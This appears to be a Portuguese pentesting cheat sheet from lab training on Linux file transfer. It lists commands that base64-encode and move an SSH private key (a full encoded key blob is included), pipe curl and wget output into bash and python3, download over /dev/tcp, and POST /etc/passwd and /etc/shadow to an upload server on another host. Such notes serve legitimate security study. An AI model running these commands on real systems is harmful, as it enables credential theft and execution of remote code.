LinkedinTryHackme

Linux File Transfer Methods

Codificação/Decodificação Base64

  • PwnBox - Verificar hash MD5 do arquivo

md5sum id_rsa

  • PwnBox - Codificar chave SSH para Base64

cat id_rsa |base64 -w 0;echo

  • Linux - Decodificar o arquivo

echo -n 'LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUFsd0FBQUFkemMyZ3RjbgpOaEFBQUFBd0VBQVFBQUFJRUF6WjE0dzV1NU9laHR5SUJQSkg3Tm9Yai84YXNHRUcxcHpJbmtiN2hIMldRVGpMQWRYZE9kCno3YjJtd0tiSW56VmtTM1BUR3ZseGhDVkRRUmpBYzloQ3k1Q0duWnlLM3U2TjQ3RFhURFY0YUtkcXl0UTFUQXZZUHQwWm8KVWh2bEo5YUgxclgzVHUxM2FRWUNQTVdMc2JOV2tLWFJzSk11dTJONkJoRHVmQThhc0FBQUlRRGJXa3p3MjFwTThBQUFBSApjM05vTFhKellRQUFBSUVBeloxNHc1dTVPZWh0eUlCUEpIN05vWGovOGFzR0VHMXB6SW5rYjdoSDJXUVRqTEFkWGRPZHo3CmIybXdLYkluelZrUzNQVEd2bHhoQ1ZEUVJqQWM5aEN5NUNHblp5SzN1Nk40N0RYVERWNGFLZHF5dFExVEF2WVB0MFpvVWgKdmxKOWFIMXJYM1R1MTNhUVlDUE1XTHNiTldrS1hSc0pNdXUyTjZCaER1ZkE4YXNBQUFBREFRQUJBQUFBZ0NjQ28zRHBVSwpFdCtmWTZjY21JelZhL2NEL1hwTlRsRFZlaktkWVFib0ZPUFc5SjBxaUVoOEpyQWlxeXVlQTNNd1hTWFN3d3BHMkpvOTNPCllVSnNxQXB4NlBxbFF6K3hKNjZEdzl5RWF1RTA5OXpodEtpK0pvMkttVzJzVENkbm92Y3BiK3Q3S2lPcHlwYndFZ0dJWVkKZW9VT2hENVJyY2s5Q3J2TlFBem9BeEFBQUFRUUNGKzBtTXJraklXL09lc3lJRC9JQzJNRGNuNTI0S2NORUZ0NUk5b0ZJMApDcmdYNmNoSlNiVWJsVXFqVEx4NmIyblNmSlVWS3pUMXRCVk1tWEZ4Vit0K0FBQUFRUURzbGZwMnJzVTdtaVMyQnhXWjBNCjY2OEhxblp1SWc3WjVLUnFrK1hqWkdqbHVJMkxjalRKZEd4Z0VBanhuZEJqa0F0MExlOFphbUt5blV2aGU3ekkzL0FBQUEKUVFEZWZPSVFNZnQ0R1NtaERreWJtbG1IQXRkMUdYVitOQTRGNXQ0UExZYzZOYWRIc0JTWDJWN0liaFA1cS9yVm5tVHJRZApaUkVJTW84NzRMUkJrY0FqUlZBQUFBRkhCc1lXbHVkR1Y0ZEVCamVXSmxjbk53WVdObEFRSURCQVVHCi0tLS0tRU5EIE9QRU5TU0ggUFJJVkFURSBLRVktLS0tLQo=' | base64 -d > id_rsa

  • Linux - Confirme a correspondência de hashes MD5

md5sum id_rsa

Downloads da Web com Wget e cURL

  • Baixar um arquivo usando wget

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh

  • Baixar um arquivo usando cURL

curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

  • Executar uma ferramenta diretamente com o cURL

curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash

  • Download sem arquivo com wget

wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3

Download with Bash (/dev/tcp)

  • Conecte-se ao servidor da Web de destino

exec 3<>/dev/tcp/10.10.10.32/80

  • Solicitação HTTP GET

echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3

  • Imprimir a resposta

cat <&3

Downloads SSH

SCP(secure copy) é um utilitário de linha de comando que permite que você copie arquivos e diretórios entre dois hosts com segurança.

  • Habilitando o servidor SSH

sudo systemctl enable ssh

  • Iniciando o servidor SSH

sudo systemctl start ssh

  • Verificando a porta de escuta SSH

netstat -lnpt

  • Linux - Baixando arquivos usando SCP

scp plaintext@192.168.49.128:/root/myroot.txt .

Observação: você pode criar uma conta de usuário temporária para transferências de arquivos e evitar usar suas credenciais ou chaves primárias em um computador remoto.

Upload Operations

  • Pwnbox - Iniciar Servidor Web

sudo python3 -m pip install --user uploadserver

  • Pwnbox - Crie um certificado autoassinado

openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'

  • O servidor web não deve hospedar o certificado. Recomendamos criar um novo diretório para hospedar o arquivo para nosso servidor web.

  • Pwnbox - Iniciar Servidor Web

mkdir https && cd https

sudo python3 -m uploadserver 443 --server-certificate ~/server.pem

  • Linux - Carregar vários arquivos

curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

Alternative Web File Transfer Method

  • Linux - Criando um servidor web com Python3

python3 -m http.server

  • Linux - Criando um servidor web com Python2.7

python2.7 -m SimpleHTTPServer

  • Linux - Criando um Servidor Web com PHP

php -S 0.0.0.0:8000

  • Linux - Criando um Servidor Web com Ruby

ruby -run -ehttpd . -p8000

  • Baixe o arquivo da máquina de destino para o Pwnbox

wget 192.168.49.128:8000/filetotransfer.txt

SCP Upload

  • File Upload using SCP

scp /etc/passwd htb-student@10.129.86.90:/home/htb-student/
PreviousQuestionNextQuestion

Last updated